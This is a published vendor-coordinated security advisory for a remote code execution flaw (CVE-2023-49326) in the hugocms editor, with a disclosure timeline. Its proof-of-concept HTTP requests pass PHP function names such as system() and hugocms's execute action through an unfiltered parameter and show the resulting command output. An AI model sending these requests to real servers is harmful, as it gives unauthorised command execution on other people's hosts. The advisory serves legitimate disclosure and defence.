usd-2023-0037 | Remote Code Execution in hugocms

Advisory ID: usd-2023-0037
Product: hugocms
Affected Version: (latest as of 25.09.2023; commit 77443d6)
Vulnerability Type: CWE-913: Improper Control of Dynamically-Managed Code Resources
Security Risk: HIGH
Vendor URL: https://hugoeditor.com/
Vendor Acknowledged Vulnerability: Yes
Vendor Status: Fixed
Advisory Status: Published
CVE Number: CVE-2023-49326
First Published: 2024-07-18
Last Update: 2024-07-18

Desciption

The application hugocms, developed by Inter-Data, provides a frontend for the static site generator hugo to manage posts, media, and configuration of a hugo website. The application does not provide any access-control mechanism and recommends to restrict access via a web server's basic auth capabilities.

Users with access to hugocms can execute arbitrary PHP code via an unfiltered URL parameter, leading to remote code execution. The flaw is present in script hugocms/editor.os.control.php and can be triggered by a GET or POST request to hugocms/editor.control.php.

Proof of Concept

The following request triggers execution of phpinfo():

GET /public/edit/hugocms/editor.control.php?action=phpinfo HTTP/1.1
Host: 10.1.1.157

The following request uses PHP's system() function to execute commands on the host system:

Request:

GET /public/edit/hugocms/editor.control.php?action=system&data=id HTTP/1.1
Host: 10.1.1.157

Response:

HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 18:32:53 GMT
Server: Apache/2.4.57 (Debian)
Content-Length: 54
Content-Type: application/jsonuid=33(www-data) gid=33(www-data) groups=33(www-data)

The following request uses hugocms' functions to execute commands on the host system:

Request:

POST /public/edit/hugocms/editor.control.php HTTP/1.1
Host: 10.1.1.157
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 42action=editor\execute&data=id+%26%26+false

Response:

HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 18:35:37 GMT
Server: Apache/2.4.57 (Debian)
Content-Length: 91
Content-Type: application/json{ "success":false, "debug":"uid=33(www-data) gid=33(www-data) groups=33(www-data) <br />" }

Timeline

  • 2023-09-25: Vulnerability identified by Florian Dewald.
  • 2023-10-02: Sent first contact request.
  • 2023-10-16: Sent reminder email mentioning disclosure deadline.
  • 2023-10-25: Sent another reminder stressing that vulnerabilities will be publicly disclosed.
  • 2023-11-13: Sent another reminder stressing our deadline and that vulnerabilities will be publicly disclosed if we receive no answer.
  • 2023-11-22: Reached vendor via phone, sent vulnerability information.
  • 2023-12-04: Sent status update request to info@inter-data.de
  • 2023-12-06: Inter-Data reports that a fix is being worked on.
  • 2024-01-03: According to Inter-Data a fix is in the works and should be finished soon.
  • 2024-01-24: Reached out to Inter-Data for another status update.
  • 2024-01-26: Inter-Data reports that the vulnerability is fixed.
  • 2024-07-18: This advisory is published.

Credits

This security vulnerability was identified by Florian Dewald of usd AG.